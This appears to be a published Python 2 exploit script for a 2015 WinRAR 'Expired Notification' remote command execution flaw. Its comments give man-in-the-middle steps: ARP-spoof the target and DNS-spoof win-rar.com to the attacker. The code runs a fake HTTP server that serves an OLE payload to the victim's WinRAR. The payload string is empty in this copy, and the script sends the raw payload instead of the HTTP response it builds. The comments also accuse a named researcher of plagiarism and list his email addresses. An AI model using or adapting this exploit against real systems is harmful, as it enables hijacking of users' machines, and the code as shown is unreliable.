#!/usr/bin/python -w # Title : WinRar Expired Notification - OLE Remote Command Execution # Date : 30/09/2015 # Author : R-73eN # Tested on : Windows Xp SP3 with WinRAR 5.21 # This exploits a vulnerability in the implementation of showing ads. # When a user opens any WINRAR file sometimes # A window with Expired Notification title loads http://www.win-rar.com/notifier/ # reminding user to buy winrar to remove ads. # Since this uses a http connection we can use Man In The Middle attack # to gain Remote Code Execution # # Triggering the vulnerability # 1) Run this python script. # 2) arpspoof the target # 3) dnsspoof www.win-rar.com to point to your IP # 4) Wait for the victim to open WinRar files. # # Video : https://youtu.be/h976wFlHGw4 # # i hope this time the "great security researcher" Mohammad Reza Espargham # me[at]reza[dot]es , reza.espargham[at]gmail[dot]com doesnt steals again my exploit ..... # # http://0day.today/exploit/description/24292 My exploit publishied in 25/09/2015 # http://0day.today/exploit/description/24296 same exploit written in perl publishied in 26/09/2015 # # # banner = "" banner +=" ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner print " [+] WinRar (Free Version) - Remote Command Execution [+]\n" import socket CRLF = "\r\n" #OLE command execution exploit = """
""" response = "HTTP/1.1 200 OK" + CRLF + "Content-Type: text/html" + CRLF + "Connection: close" + CRLF + "Server: Apache" + CRLF + "Content-Length: " + str(len(exploit)) + CRLF + CRLF + exploit + CRLF sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) host = raw_input(" Enter Local IP: ") server_address = (host, 8080) sock.bind(server_address) print "\n[+] Server started " + host + " [+]" sock.listen(1) print "\n[+] Waiting for request . . . [+]" print "\n[+] Arpspoof target , and make win-rar.com to point to your IP [+]" connection, client_address = sock.accept() while True: connection.recv(2048) print "[+] Got request , sending exploit . . .[+]" connection.send(exploit) print "[+] Exploit sent , A calc should pop up . . [+]" print "\nhttps://www.infogen.al/\n" exit(0)